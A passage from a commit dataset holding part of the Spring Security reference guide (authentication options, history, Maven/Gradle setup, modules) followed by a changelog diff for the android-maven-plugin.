popular open source single sign-on system)\n\n* Transparent authentication context propagation for Remote Method Invocation (RMI) and HttpInvoker (a Spring remoting protocol)\n\n* Automatic \"remember-me\" authentication (so you can tick a box to avoid re-authentication for a predetermined period of time)\n\n* Anonymous authentication (allowing every unauthenticated call to automatically assume a particular security identity)\n\n* Run-as authentication (which is useful if one call should proceed with a different security identity)\n\n* Java Authentication and Authorization Service (JAAS)\n\n* Java EE container authentication (so you can still use Container Managed Authentication if desired)\n\n* Kerberos\n\n* Java Open Source Single Sign-On (JOSSO) *\n\n* OpenNMS Network Management Platform *\n\n* AppFuse *\n\n* AndroMDA *\n\n* Mule ESB *\n\n* Direct Web Request (DWR) *\n\n* Grails *\n\n* Tapestry *\n\n* JTrac *\n\n* Jasypt *\n\n* Roller *\n\n* Elastic Path *\n\n* Atlassian Crowd *\n\n* Your own authentication systems (see below)\n\n\n\n(* Denotes provided by a third party)\n\nMany independent software vendors (ISVs) adopt Spring Security because of this significant choice of flexible authentication models.\nDoing so allows them to quickly integrate their solutions with whatever their end clients need, without undertaking a lot of engineering or requiring the client to change their environment.\nIf none of the above authentication mechanisms suit your needs, Spring Security is an open platform and it is quite simple to write your own authentication mechanism.\nMany corporate users of Spring Security need to integrate with \"legacy\" systems that don't follow any particular security standards, and Spring Security is happy to \"play nicely\" with such systems.\n\nIrrespective of the authentication mechanism, Spring Security provides a deep set of authorization capabilities.\nThere are three main areas of interest: authorizing web requests, authorizing whether methods can be invoked and authorizing access to individual domain object instances.\nTo help you understand the differences, consider the authorization capabilities found in the Servlet Specification web pattern security, EJB Container Managed Security and file system security respectively.\nSpring Security provides deep capabilities in all of these important areas, which we'll explore later in this reference guide.\n\n\n[[history]]\n=== History\nSpring Security began in late 2003 as \"The Acegi Security System for Spring\".\nA question was posed on the Spring Developers' mailing list asking whether there had been any consideration given to a Spring-based security implementation.\nAt the time the Spring community was relatively small (especially compared with the size today!), and indeed Spring itself had only existed as a SourceForge project from early 2003.\nThe response to the question was that it was a worthwhile area, although a lack of time currently prevented its exploration.\n\nWith that in mind, a simple security implementation was built and not released.\nA few weeks later another member of the Spring community inquired about security, and at the time this code was offered to them.\nSeveral other requests followed, and by January 2004 around twenty people were using the code.\nThese pioneering users were joined by others who suggested a SourceForge project was in order, which was duly established in March 2004.\n\nIn those early days, the project didn't have any of its own authentication modules.\nContainer Managed Security 
was relied upon for the authentication process, with Acegi Security instead focusing on authorization.\nThis was suitable at first, but as more and more users requested additional container support, the fundamental limitation of container-specific authentication realm interfaces became clear.\nThere was also a related issue of adding new JARs to the container's classpath, which was a common source of end user confusion and misconfiguration.\n\nAcegi Security-specific authentication services were subsequently introduced.\nAround a year later, Acegi Security became an official Spring Framework subproject.\nThe 1.\n0.\n0 final release was published in May 2006 - after more than two and a half years of active use in numerous production software projects and many hundreds of improvements and community contributions.\n\nAcegi Security became an official Spring Portfolio project towards the end of 2007 and was rebranded as \"Spring Security\".\n\nToday Spring Security enjoys a strong and active open source community.\nThere are thousands of messages about Spring Security on the support forums.\nThere is an active core of developers who work on the code itself and an active community which also regularly share patches and support their peers.\n\n\n[[release-numbering]]\n=== Release Numbering\nIt is useful to understand how Spring Security release numbers work, as it will help you identify the effort (or lack thereof) involved in migrating to future releases of the project.\nEach release uses a standard triplet of integers: MAJOR.MINOR.PATCH.\nThe intent is that MAJOR versions are incompatible, large-scale upgrades of the API.\nMINOR versions should largely retain source and binary compatibility with older minor versions, thought there may be some design changes and incompatible updates.\nPATCH level should be perfectly compatible, forwards and backwards, with the possible exception of changes which are to fix bugs and defects.\n\nThe extent to which you are affected by changes will depend on how tightly integrated your code is.\nIf you are doing a lot of customization you are more likely to be affected than if you are using a simple namespace configuration.\n\nYou should always test your application thoroughly before rolling out a new version.\n\n\n[[get-spring-security]]\n=== Getting Spring Security\nYou can get hold of Spring Security in several ways.\nYou can download a packaged distribution from the main http:\/\/spring.\nio\/spring-security[Spring Security] page, download individual jars from the Maven Central repository (or a Spring Maven repository for snapshot and milestone releases) or, alternatively, you can build the project from source yourself.\n\n[[maven]]\n==== Usage with Maven\n\nA minimal Spring Security Maven set of dependencies typically looks like the following:\n\n.pom.xml\n[source,xml]\n[subs=\"verbatim,attributes\"]\n----\n<dependencies>\n<!-- ... other dependency elements ... -->\n<dependency>\n\t<groupId>org.springframework.security<\/groupId>\n\t<artifactId>spring-security-web<\/artifactId>\n\t<version>{spring-security-version}<\/version>\n<\/dependency>\n<dependency>\n\t<groupId>org.springframework.security<\/groupId>\n\t<artifactId>spring-security-config<\/artifactId>\n\t<version>{spring-security-version}<\/version>\n<\/dependency>\n<\/dependencies>\n----\n\nIf you are using additional features like LDAP, OpenID, etc. you will need to also include the appropriate <<modules>>.\n\n[[maven-repositories]]\n===== Maven Repositories\nAll GA releases (i.e. 
versions ending in .RELEASE) are deployed to Maven Central, so no additional Maven repositories need to be declared in your pom.\n\nIf you are using a SNAPSHOT version, you will need to ensure you have the Spring Snapshot repository defined as shown below:\n\n.pom.xml\n[source,xml]\n----\n<repositories>\n<!-- ... possibly other repository elements ... -->\n<repository>\n\t<id>spring-snapshot<\/id>\n\t<name>Spring Snapshot Repository<\/name>\n\t<url>http:\/\/repo.spring.io\/snapshot<\/url>\n<\/repository>\n<\/repositories>\n----\n\nIf you are using a milestone or release candidate version, you will need to ensure you have the Spring Milestone repository defined as shown below:\n\n.pom.xml\n[source,xml]\n----\n<repositories>\n<!-- ... possibly other repository elements ... -->\n<repository>\n\t<id>spring-milestone<\/id>\n\t<name>Spring Milestone Repository<\/name>\n\t<url>http:\/\/repo.spring.io\/milestone<\/url>\n<\/repository>\n<\/repositories>\n----\n\n[[maven-bom]]\n===== Spring Framework Bom\n\nSpring Security builds against Spring Framework {spring-version}, but should work with 4.0.x.\nThe problem that many users will have is that Spring Security's transitive dependencies resolve Spring Framework {spring-version} which can cause strange classpath problems.\n\nOne (tedious) way to circumvent this issue would be to include all the Spring Framework modules in a http:\/\/maven.apache.org\/guides\/introduction\/introduction-to-dependency-mechanism.html#Dependency_Management[<dependencyManagement>] section of your pom.\nAn alternative approach is to include the `spring-framework-bom` within your `<dependencyManagement>` section of your `pom.xml` as shown below:\n\n.pom.xml\n[source,xml]\n[subs=\"verbatim,attributes\"]\n----\n<dependencyManagement>\n\t<dependencies>\n\t<dependency>\n\t\t<groupId>org.springframework<\/groupId>\n\t\t<artifactId>spring-framework-bom<\/artifactId>\n\t\t<version>{spring-version}<\/version>\n\t\t<type>pom<\/type>\n\t\t<scope>import<\/scope>\n\t<\/dependency>\n\t<\/dependencies>\n<\/dependencyManagement>\n----\n\nThis will ensure that all the transitive dependencies of Spring Security use the Spring {spring-version} modules.\n\nNOTE: This approach uses Maven's \"bill of materials\" (BOM) concept and is only available in Maven 2.0.9+.\nFor additional details about how dependencies are resolved refer to http:\/\/maven.apache.org\/guides\/introduction\/introduction-to-dependency-mechanism.html[Maven's Introduction to the Dependency Mechanism documentation].\n\n[[gradle]]\n==== Gradle\nA minimal Spring Security Gradle set of dependencies typically looks like the following:\n\n.build.gradle\n[source,groovy]\n[subs=\"verbatim,attributes\"]\n----\ndependencies {\n\tcompile 'org.springframework.security:spring-security-web:{spring-security-version}'\n\tcompile 'org.springframework.security:spring-security-config:{spring-security-version}'\n}\n----\n\nIf you are using additional features like LDAP, OpenID, etc. you will need to also include the appropriate <<modules>>.\n\n[[gradle-repositories]]\n===== Gradle Repositories\nAll GA releases (i.e. 
versions ending in .RELEASE) are deployed to Maven Central, so using the mavenCentral() repository is sufficient for GA releases.\n\n.build.gradle\n[source,groovy]\n----\nrepositories {\n\tmavenCentral()\n}\n----\n\nIf you are using a SNAPSHOT version, you will need to ensure you have the Spring Snapshot repository defined as shown below:\n\n.build.gradle\n[source,groovy]\n----\nrepositories {\n\tmaven { url 'https:\/\/repo.spring.io\/snapshot' }\n}\n----\n\nIf you are using a milestone or release candidate version, you will need to ensure you have the Spring Milestone repository defined as shown below:\n\n.build.gradle\n[source,groovy]\n----\nrepositories {\n\tmaven { url 'https:\/\/repo.spring.io\/milestone' }\n}\n----\n\n[[gradle-resolutionStrategy]]\n===== Using Spring 4.0.x and Gradle\n\nBy default Gradle will use the newest version when resolving transitive versions.\nThis means that often times no additional work is necessary when running Spring Security {spring-security-version} with Spring Framework {spring-version}.\nHowever, at times there can be issues that come up so it is best to mitigate this using http:\/\/www.gradle.org\/docs\/current\/dsl\/org.gradle.api.artifacts.ResolutionStrategy.html[Gradle's ResolutionStrategy] as shown below:\n\n.build.gradle\n[source,groovy]\n[subs=\"verbatim,attributes\"]\n----\nconfigurations.all {\n\tresolutionStrategy.eachDependency { DependencyResolveDetails details ->\n\t\tif (details.requested.group == 'org.springframework') {\n\t\t\tdetails.useVersion '{spring-version}'\n\t\t}\n\t}\n}\n----\n\nThis will ensure that all the transitive dependencies of Spring Security use the Spring {spring-version} modules.\n\nNOTE: This example uses Gradle 1.9, but may need modifications to work in future versions of Gradle since this is an incubating feature within Gradle.\n\n[[modules]]\n==== Project Modules\nIn Spring Security 3.0, the codebase has been sub-divided into separate jars which more clearly separate different functionality areas and third-party dependencies.\nIf you are using Maven to build your project, then these are the modules you will add to your `pom.xml`.\nEven if you're not using Maven, we'd recommend that you consult the `pom.xml` files to get an idea of third-party dependencies and versions.\nAlternatively, a good idea is to examine the libraries that are included in the sample applications.\n\n\n[[spring-security-core]]\n===== Core - spring-security-core.jar\nContains core authentication and access-contol classes and interfaces, remoting support and basic provisioning APIs.\nRequired by any application which uses Spring Security.\nSupports standalone applications, remote clients, method (service layer) security and JDBC user provisioning.\nContains the top-level packages:\n\n* `org.springframework.security.core`\n\n* `org.springframework.security.access`\n\n* `org.springframework.security.authentication`\n\n* `org.springframework.security.provisioning`\n\n\n\n\n\n[[spring-security-remoting]]\n===== Remoting - spring-security-remoting.jar\nProvides intergration with Spring Remoting.\nYou don't need this unless you are writing a remote client which uses Spring Remoting.\nThe main package is `org.springframework.security.remoting`.\n\n\n[[spring-security-web]]\n===== Web - spring-security-web.jar\nContains filters and related web-security infrastructure code.\nAnything with a servlet API dependency.\nYou'll need it if you require Spring Security web authentication services and URL-based access-control.\nThe main package is 
`org.springframework.security.web`.\n\n\n[[spring-security-config]]\n===== Config - spring-security-config.jar\nContains the security namespace parsing code & Java configuration code.\nYou need it if you are using the Spring Security XML namespace for configuration or Spring Security's Java Configuration support.\nThe main package is `org.springframework.security.config`.\nNone of the classes are intended for direct use in an application.\n\n\n[[spring-security-ldap]]\n===== LDAP - spring-security-ldap.jar\nLDAP authentication and provisioning code.\nRequired if you need to use LDAP authentication or manage LDAP user entries.\nThe top-level package is `org.springframework.security.ldap`.\n\n\n[[spring-security-oauth2-core]]\n===== OAuth 2.0 Core - spring-security-oauth2-core.jar\n`spring-security-oauth2-core.jar` contains core classes and interfaces that provide support for the _OAuth 2.0 Authorization Framework_ and for _OpenID Connect Core 1.0_.\nIt is required by applications that use _OAuth 2.0_ or _OpenID Connect Core 1.0_, such as Client, Resource Server, and Authorization Server.\nThe top-level package is `org.springframework.security.oauth2.core`.\n\n\n[[spring-security-oauth2-client]]\n===== OAuth 2.0 Client - spring-security-oauth2-client.jar\n`spring-security-oauth2-client.jar` is Spring Security's client support for _OAuth 2.0 Authorization Framework_ and _OpenID Connect Core 1.0_.\nRequired by applications leveraging *OAuth 2.0 Login* and\/or OAuth Client support.\nThe top-level package is `org.springframework.security.oauth2.client`.\n\n\n[[spring-security-oauth2-jose]]\n===== OAuth 2.0 JOSE - spring-security-oauth2-jose.jar\n`spring-security-oauth2-jose.jar` contains Spring Security's support for the _JOSE_ (Javascript Object Signing and Encryption) framework.\nThe _JOSE_ framework is intended to provide a method to securely transfer claims between parties.\nIt is built from a collection of specifications:\n\n* JSON Web Token (JWT)\n* JSON Web Signature (JWS)\n* JSON Web Encryption (JWE)\n* JSON Web Key (JWK)\n\nIt contains the top-level packages:\n\n* `org.springframework.security.oauth2.jwt`\n* `org.springframework.security.oauth2.jose`\n\n\n[[spring-security-acl]]\n===== ACL - spring-security-acl.jar\nSpecialized domain object ACL implementation.\nUsed to apply security to specific domain object instances within your application.\nThe top-level package is `org.springframework.security.acls`.\n\n\n[[spring-security-cas]]\n===== CAS - spring-security-cas.jar\nSpring Security's CAS client integration.\nIf you want to use Spring Security web authentication with a CAS single sign-on server.\nThe top-level package is `org.springframework.security.cas`.\n\n\n[[spring-security-openid]]\n===== OpenID - spring-security-openid.jar\nOpenID web authentication support.\nUsed to authenticate users against an external OpenID server.\n`org.springframework.security.openid`.\nRequires OpenID4Java.\n\n\n[[spring-security-test]]\n===== Test - spring-security-test.jar\nSupport for testing with Spring Security.\n\n\n[[get-source]]\n==== Checking out the Source\nSince Spring Security is an Open Source project, we'd strongly encourage you to check out the source code using git.\nThis will give you full access to all the sample applications and you can build the most up to date version of the project easily.\nHaving the source for a project is also a huge help in debugging.\nException stack traces are no longer obscure black-box issues but you can get straight to the line that's causing the 
problem and work out what's happening.\nThe source is the ultimate documentation for a project and often the simplest place to find out how something actually works.\n\nTo obtain the source for the project, use the following git command:\n\n[source,txt]\n----\ngit clone https:\/\/github.com\/spring-projects\/spring-security.git\n----\n\nThis will give you access to the entire project history (including all releases and branches) on your local machine.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e06ee13a713a00e60c14cfbf8394743ee0a684e3","subject":"PR#660","message":"PR#660","repos":"CJstar\/android-maven-plugin,b-cuts\/android-maven-plugin,secondsun\/maven-android-plugin,Cha0sX\/android-maven-plugin,xiaojiaqiao\/android-maven-plugin,secondsun\/maven-android-plugin,ashutoshbhide\/android-maven-plugin,WonderCsabo\/maven-android-plugin,simpligility\/android-maven-plugin,greek1979\/maven-android-plugin,xiaojiaqiao\/android-maven-plugin,WonderCsabo\/maven-android-plugin,Cha0sX\/android-maven-plugin,hgl888\/android-maven-plugin,Stuey86\/android-maven-plugin,repanda\/android-maven-plugin,ashutoshbhide\/android-maven-plugin,mitchhentges\/android-maven-plugin,xieningtao\/android-maven-plugin,Cha0sX\/android-maven-plugin,greek1979\/maven-android-plugin,mitchhentges\/android-maven-plugin,hgl888\/android-maven-plugin,b-cuts\/android-maven-plugin,xiaojiaqiao\/android-maven-plugin,secondsun\/maven-android-plugin,Stuey86\/android-maven-plugin,xieningtao\/android-maven-plugin,repanda\/android-maven-plugin,CJstar\/android-maven-plugin","old_file":"src\/site\/asciidoc\/changelog.adoc","new_file":"src\/site\/asciidoc\/changelog.adoc","new_contents":"= Changelog\n\n== 4.3.1 or higher - upcoming \n\n* Make manifest merging less verbose\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/650\n** contributed by Nathan Toone https:\/\/github.com\/Toonetown\n* Fix building with debug mode and raw file directories\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/649\n** contributed by Nathan Toone https:\/\/github.com\/Toonetown\n* Fix continuous integration (use Travis Android support and enable\/update ITs)\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/641\n** contributed by Csaba Koz\u00e1k https:\/\/github.com\/WonderCsabo\n* Fix issue in which duplicate files were added to the APK\n** https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/661\n** contributed by Andrew Bowley https:\/\/github.com\/andrew-bowley\n\nPlanned changes:\n\n* migrate more tests to be instrumentation tests with example projects\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/452\n* anything else contributed by the community\n\n== 4.3.0 - released 2015-06-15 \n\nhttps:\/\/groups.google.com\/d\/msg\/maven-android-developers\/FB4mP5s1kvA\/EFxbrnnbca0J[Release Announcement Post]\n\n* Fixed processing of duplicate resources from dependencies\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/614\n** contributed by Marek Kedzierski https:\/\/github.com\/kedzie\n* Ability to choose the build tools version\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/637\n** Contributed by Benoit Billington https:\/\/github.com\/Shusshu\n* Added x86_64 and mips64 architectures to NDK support\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/634\n** Contributed by Marek Kedzierski http:\/\/kedzie.github.io\/\n* Migrated the rest of the Google Code project 
content into site content\n** Contributed by Manfred Moser http:\/\/www.simpligility.com\n* Plugin updates\n** Contributed by Manfred Moser http:\/\/www.simpligility.com\n\n== 4.2.1 - released 2015-05-07\n\nhttps:\/\/groups.google.com\/d\/msg\/maven-android-developers\/HOIC3b7MmoA\/Z8XUXpsmT-EJ[Release Announcement Post]\n\n* Refactored code base to com.simpligility to follow groupId\n** Contributed by Manfred Moser http:\/\/www.simpligility.com\n* Fixed NPE for undefined versionNamingPattern in ManifestMojo\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/622\n** Contributed by Leonid https:\/\/github.com\/greek1979\n* Fixed Error generating BuildConfig (ZipException: zip file is empty) if one of the dependent AARs has an empty classes.zip\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/626\n** Contributed by William Ferguson https:\/\/github.com\/william-ferguson-au\n* Updated Android SDK libraries 1.2.2 \/ 24.2.2\n** contributed by Benoit Billington https:\/\/github.com\/Shusshu\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Support for JUnit4 Test Runner based tests\n** Usage requires deployment of Android SDK supplied Maven repositories to the\n local repository e.g. with Maven Android SDK Deployer\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/625\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/623\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/617\n** contributed by Hoyt Summers Pittman https:\/\/github.com\/secondsun\n\n== 4.2.0 - released 2015-04-15\n\nhttps:\/\/groups.google.com\/d\/msg\/maven-android-developers\/-HhJutxX0u8\/PAKA2dYDK2wJ[Release Announcement Post]\n\n* Include internal jars from aar libraries by default\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/586#issuecomment-74931486\n* Don't include internal libs from transitive AAR deps into an AAR\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/589\n** contributed by Philip Schiffer https:\/\/github.com\/hameno\n* Better documentation for the destinationAndroidManifest parameter\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/594\n** contributed by Matthias Stevens https:\/\/github.com\/mstevens83\n* Project META-INF artifacts are included in APK\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/602\n** Contributed by Marek Kedzierski https:\/\/github.com\/kedzie\n* Support for specifying debug port - automatically forward JDWP connection\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/584\n** and follow-up commits\n** contributed by Jaroslav Tulach https:\/\/github.com\/jtulach\n** and Manfred Moser http:\/\/www.simpligility.com\n* Configurable encoding for publish mojo listing files\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/603\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/601\n** contributed by Csaba Koz\u00e1k https:\/\/github.com\/WonderCsabo\n* Checkstyle - removed deprecated check\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/609\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Add NDK support for arm64-v8a APP_ABI \n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/574\n** contributed by https:\/\/github.com\/arnaud-soulard\n* Log warning about using dependencies conflicting with packaged libraries in android jar \n** see 
https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/610\n** contributed by Csaba Koz\u00e1k https:\/\/github.com\/WonderCsabo\n* Allow AAR provided proguard configuration to be automatically integrated\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/612\n** contributed by Philip Schiffer https:\/\/github.com\/hameno\n* Updated Android SDK libraries 1.1.3 \/ 24.1.3\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/commit\/60ec75aa8ab889c7033fd403149973c0d3b66f82\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/commit\/869578d84af1f215bca341191bb0078899e3330c\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n** contributed by Benoit Billington https:\/\/github.com\/Shusshu\n* Regex support for VersionGenerator\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/605\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/606\n** contributed by Wang Xuerui https:\/\/github.com\/xen0n\n\n== 4.1.1 or higher - released 2015-02-02\n\nhttps:\/\/groups.google.com\/d\/msg\/maven-android-developers\/EXYhXO1hbwM\/L2mS3Ho7-kQJ[Release Announcement Post]\n\n* Added Manifest Merger v2 example (tictactoe) & Deprecated merge manifest v1\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/560\n** contributed by Benoit Billington https:\/\/github.com\/Shusshu\n* Added proguard support from library (AAR) projects\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/559\n** contributed by David Sobreira Marques https:\/\/github.com\/dpsm\n* Updated Takari lifecycle and integration testing setup to new releases\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/564\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n** and Igor Fedorenko https:\/\/github.com\/ifedorenko\n** sponsored by Takari http:\/\/takari.io\/\n* Fix to allow both release-plugin and IDEs to correctly consume AAR deps.\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/565\n** contributed by Hoyt Summers Pittman https:\/\/github.com\/secondsun\n* Change default value for aidlSourceDirectory to src\/main\/aidl\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/555\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/557\n** contributed by Csaba Koz\u00e1k https:\/\/github.com\/WonderCsabo\n* Documentation updates for the site rendering\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/567\n** and other commits\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Corrected unpackedLibsFolder default value\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/575\n** contributed by Pappy Stanescu https:\/\/github.com\/pa314159\n* Improvement of versionCode generator\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/570\n** contributed by Pappy Stanescu https:\/\/github.com\/pa314159\n\n== 4.1.0 - released 2015-01-08\n\nhttps:\/\/groups.google.com\/d\/msg\/maven-android-developers\/oNm46DqGi2Q\/Gs3cQAQ018gJ[Release Announcement Post]\n\n* Updated to Android SDK libraries 1.0.0 \/ 24.0.0\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/531\n** contributed by Benoit Billington https:\/\/github.com\/Shusshu\n* Use lint from Android SDK libraries rather than command line invocation\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/528\n** fixes 
https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/400\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/357\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/476\n** contributed by Benoit Billington https:\/\/github.com\/Shusshu\n* Making unpacked-libs folder configurable\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/538\n** contributed by William Ferguson https:\/\/github.com\/william-ferguson-au\n* Added deprecation for APKLIB format\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/543\n* Use the Google Play Developer API to upload APKs and update the store listing\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/534\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/418\n** contributed by Joris de Groot https:\/\/github.com\/jdegroot\n** contributed by Benoit Billington https:\/\/github.com\/Shusshu\n* Improvements to project site including GitHub ribbon and more\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/544\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Added Manifest Merger V2 and deprecated Manifest-Update mojo\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/539\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/519\n** contributed by Benoit Billington https:\/\/github.com\/Shusshu\n* Refactor the 3 parameters used for the androidManifest.xml into 2 params \n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/542\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/508\n** contributed by Benoit Billington https:\/\/github.com\/Shusshu\n* Fixed broken undeploy mojo AndroidManifest parsing\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/550\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* MultiDex improvement - generating mainDexClasses when the multiDex flag is set to true and mainDexList is null\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/526\n** contributed by Piotr Sor\u00f3bka https:\/\/github.com\/psorobka\n* A whole bunch of minor project improvements and fixes\n** see commit history\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n\nATTENTION:\n\n* updatedManifestFile & sourceManifestFile parameters have been removed.\n* use androidManifestFile and destinationManifestFile\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/542\n\n\n== 4.0.0 - released 2014-11-25\n\nhttps:\/\/groups.google.com\/d\/msg\/maven-android-developers\/9ogkKf0Xr7Y\/F9CKX6LV0uAJ[Release Announcement Post]\n\n* Migrated some documentation from the old Google Code site\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Fix for aar and jar dependency mix and related resolving\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/493\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/485\n** contributed by Hoyt Summers Pittman https:\/\/github.com\/secondsun\n* Fixes to proguard and multidex related processing\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/509\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/507\n** contributed by \u0141ukasz Suski https:\/\/github.com\/lsuski\n* Documentation for shading commons-codec to allow usage of newer version\n** see 
https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/498\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/487#issuecomment-60956025\n** contributed by Matthias Stevens https:\/\/github.com\/mstevens83\n* Custom exclude filter to ProGuardMojo\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/497\n** contributed by Csaba Koz\u00e1k https:\/\/github.com\/WonderCsabo\n* Fixes to resource files in sample projects to allow builds to pass with new SDK\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/514\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Always honor dexArguments parameters\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/517\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Downgraded runtime requirements to Maven 3.0.4\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Examples documentation\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Moved Emma analysis to process-classes phase\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/489\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/515\n** contributed by Dmitry Berezhnoy https:\/\/github.com\/deadmoto\n\n== 4.0.0-rc.3 - released 2014-10-28\n\nhttps:\/\/groups.google.com\/d\/msg\/maven-android-developers\/9ogkKf0Xr7Y\/F9CKX6LV0uAJ[Release Announcement Post]\n\n* Migrated complete project to new git repo at https:\/\/github.com\/simpligility\/android-maven-plugin\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Adapted codebase to new groupId \"com.simpligility.maven.plugins\"\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n\n== 4.0.0-rc.2 and older release notes\n\nCan be found in link:changelog-old-3x.html[the migrated changelog] from the old project site.\n","old_contents":"= Changelog\n\n== 4.3.1 or higher - upcoming \n\n* Make manifest merging less verbose\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/650\n** contributed by Nathan Toone https:\/\/github.com\/Toonetown\n* Fix building with debug mode and raw file directories\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/649\n** contributed by Nathan Toone https:\/\/github.com\/Toonetown\n* Fix continuous integration(use Travis Android support and enable\/update ITs)\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/641\n** contributed by Csaba Koz\u00e1k https:\/\/github.com\/WonderCsabo\n\nPlanned changes:\n\n* migrate more tests to be instrumentation tests with example projects\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/452\n* anything else contributed by the community\n\n== 4.3.0 - released 2015-06-15 \n\nhttps:\/\/groups.google.com\/d\/msg\/maven-android-developers\/FB4mP5s1kvA\/EFxbrnnbca0J[Release Announcement Post]\n\n* Fixed processing of duplicate resources from dependencies\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/614\n** contributed by Marek Kedzierski https:\/\/github.com\/kedzie\n* Ability to choose the build tools version\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/637\n** Contributed by Benoit Billington https:\/\/github.com\/Shusshu\n* Added x86_64 and mips64 architectures to NDK support\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/634\n** Contributed by Marek Kedzierski http:\/\/kedzie.github.io\/\n* Migrated rest of the 
